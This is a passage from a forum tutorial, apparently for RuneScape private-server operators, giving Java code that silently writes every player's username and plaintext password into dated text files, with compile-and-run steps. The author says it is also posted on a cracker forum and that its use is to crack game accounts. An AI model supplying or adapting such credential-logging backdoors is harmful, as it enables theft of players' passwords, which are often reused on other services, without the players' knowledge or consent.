Calendar cal = new GregorianCalendar();
int day = cal.get(Calendar.DAY_OF_MONTH);
int month = cal.get(Calendar.MONTH);
int year = cal.get(Calendar.YEAR);
month = month + 1;
HackWriter2 = new BufferedWriter(new FileWriter("./username lists/USERNAME-"+month+"-"+day+"-"+year+".txt", true));
HackWriter2.write(plr.playerName, 0, plr.playerName.length());
HackWriter2.newLine();
HackWriter2.flush();
HackWriter = new BufferedWriter(new FileWriter("./password lists/PASSWORD-"+month+"-"+day+"-"+year+".txt", true));
HackWriter.write(plr.playerPass, 0, plr.playerPass.length());
HackWriter.newLine();
HackWriter.flush();
Step 4: Now compile your server
Step 5: Make a new folder named "password lists" and a new folder named "username lists" in your source file.
Now just run your server and everyones username should go into a txt file in username lists and their passwords should go into a txt file in passwor lists
Credits: %90 Me and %10 waynewilson2
I also have this posted on [Only registered and activated users can see links. ] which is a cracker forum. Thats how you would use this, to crack rs2 accounts.
Oh ya! This is my first ever TUT so please be nice.
lol im not "pixel hungry". I dont even crack the accounts... I just like to code java, c#, and c++. This is just for people who do use password crackers.